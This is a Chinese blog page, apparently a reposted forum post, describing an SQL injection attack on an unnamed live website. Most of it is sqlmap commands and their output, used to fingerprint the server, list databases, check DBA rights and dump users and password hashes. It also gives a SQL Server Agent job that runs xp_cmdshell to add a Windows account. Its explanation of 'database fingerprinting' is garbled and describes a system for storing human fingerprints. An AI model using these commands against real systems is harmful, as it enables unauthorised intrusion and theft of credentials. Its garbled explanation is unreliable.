入门 硬件知识 电脑基础 上网入门 故障 电脑修护 电脑健康 精通电脑 网站 DIV+CSS 建站知识 SEO知识
教程 电脑操作 平面设计 路由设置 技巧 Word Excel QQ技巧 壁纸 自然风景 酷车美女 系统桌面
系统 安装系统 系统技巧 系统设置 安全 木马查杀 黑客防御 安全资讯 美女 明星写真 清纯美女 性感美女

主页 > 网络安全 > 安全知识 > INTRODUCE

关于一个 public权限注入点的 逻辑

发布时间:2013-04-19 作者:电脑知识网 来源:www.sogoupc.com 字号:
这段时间一直在研究SQL注入 和 几个脚本  感觉收获还是很大的  看了论坛这几天的动态 发现炊少又开始了搜狗电脑知识维护 搜狗电脑知识技巧
说下 sql server 2000 中 一个public 权限注入的问题  前段时间看了个站发现一个注入点 主站是aspx的 注入点基本没有 有的也上了防注入搜狗电脑知识维护 搜狗电脑知识技巧

找了一会发现他有旧版的网站 asp的 很多注入点都做了安全 后来被我找到一个很诧异的sql注入

  • python sqlmap/sqlmap.py -u ?lmid=100
  •  

    跑了下 发现能把所有的库都列不出来

    原本以为能跨裤  结果发现悲剧了  那怎么办呢 注入是在 可是列不出库 后来自己 研究了下 SQLMAP注入工具的一些资料 整理出以下方法 代码如下

  • python sqlmap/sqlmap.py -u ?lmid=100  -v 1 -f -b 数据库指纹输出
  •  

    什么叫做 数据库指纹输出 其实说白了就是一下几点 :根据用户需要进行调查和分析,了解它们对数据倍息处理的目的和要求,确定数据库指纹管理系统应具备下列功能: (1)建库和存储指纹及与该指纹有关的人员的情况信息l (2)方便用户对库进行插入、删除、修改、添加赫记录’ (3)为用户提供准确、快速的查询检索手段

    查出来的结果:

  •   May  3 2005 23:18:38   Copyright (c) 1988-2003 Microsoft Corporation  Standard

  • Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

  • web server operating system: Windows 2003

  • web application technology: ASP.NET, Microsoft IIS 6.0, ASP

  • back-end DBMS operating system: Windows 2003 Service Pack 1

  • back-end DBMS: active fingerprint: Microsoft SQL Server 2000

  •                banner parsing fingerprint: Microsoft SQL Server 2000 Service Pac

  • k 4 version 8.00.2039

  •                html error message fingerprint: Microsoft SQL Server

  • banner:

  • ---

  • Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)

  •         May  3 2005 23:18:38

  •         Copyright (c) 1988-2003 Microsoft Corporation

  •         Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

  • ---
  •  

    上面是什么意思 我就不多说了 这个网站数据库所在的服务器的 系统 什么的 大家应该都知道了

    为什么要做指纹输出呢

  • python sqlmap/sqlmap.py -u ?lmid=100 --user-agent --dbs
  •  

    很多网站这么执行是查不出数据库的 因为sqlmap的默认读取数据库 是用的默认的组件 所以你要知道数据库指纹输出之后

    再来搞定列库 我整理出来的是一下代码

  • python sqlmap/sqlmap.py -u ?lmid=100 --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows

  • NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.

  • 648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --dbs
  •  

    这样之后 数据库就出来了 别问我为什么 自己百度下

    数据全部列出来了 然后我要看看这个注入点的权限

  • 判断当前用户是否是dba

  • python sqlmap/sqlmap.py -u ?lmid=100  --is-dba -v 1
  •  

    出来的结果

  • current user is DBA:    'False'
  •  

    看到这个结果 大家都懂的 我就不解释了  

    然后我查看下数据库的用户有哪些

  • python sqlmap/sqlmap.py -u ?lmid=100 --users -v 0
  •  

    输出的结果

  • database management system users [1]:

  • [*] BUILTIN\Administrators
  •  

    好吧 大家懂了么 没懂的可以自己去百度了

    本来还想列出数据库密码的结果 碎了  把语句发出来给大家吧

    列数据库密码:

  • python sqlmap/sqlmap.py -u ?lmid=100  --passwords -v 0

  • python sqlmap/sqlmap.py -u ?lmid=100  --passwords -U sa -v 0
  •  

    为什么有两个 大家懂的 下面那个是针对sa权限的

    然后查看下数据用户的权限:

  • python sqlmap/sqlmap.py -u ?lmid=100 --privileges -v 0

  • python sqlmap/sqlmap.py -u ?lmid=100 --privileges -U postgres -v 0
  •  

    由于我测试的网站是public权限 所以输出是错误的 我就不贴出来了 方法是给大家了

    渗透到这一步 基本的数据库的信息都收集的差不多了 注入了 就找后台 后来是膜拜了各位神也没把后台找出来了

    最终放弃了 从sql注入点入手吧 然后从网上找了些资料 问了下蓝娃 蓝娃给我这么个东西 我贴出来给大家吧

  • SQL Server Agent 这服务必须开启

  •  

  • 开启服务后进入查询分析器. 这里我是用新建的public用户

  •  

  • 首先 Select host_name() 获取当前库服务器机器名

  • 然后在查询分析器执行下面的代码

  • USE msdb;

  • EXEC sp_add_job @job_name = 'GetSystemOnSQL',

  • @enabled = 1,

  • @delete_level = 1;

  • EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',

  • @step_name = 'Exec my sql',

  • @subsystem = 'TSQL',

  • @command = 'exec master..xp_execresultset N''select ''''exec

  • master..xp_cmdshell "net user iisloger hook /add> c:\fish.txt"'''''',N''Master''';

  • EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',

  • @server_name = 'rst-29w3h2q5x73';

  • EXEC sp_start_job @job_name = 'GetSystemOnSQL'--
  •  

    public 那全新啊的方法 大家自己看吧  要用sql分析器- - 可是这站是站库分离 只支持内网访问

    然后我就碎了 渗透到这一步 我动不了了 但是我觉得也算是一次经历吧 发出来给大家看看
    文章: 关于一个 public权限注入点的 逻辑
    地址:http://www.sogoupc.com/anquan/201304/7939.html
    ------分隔线----------------------------
    ------分隔线----------------------------
    热门安全知识文章推荐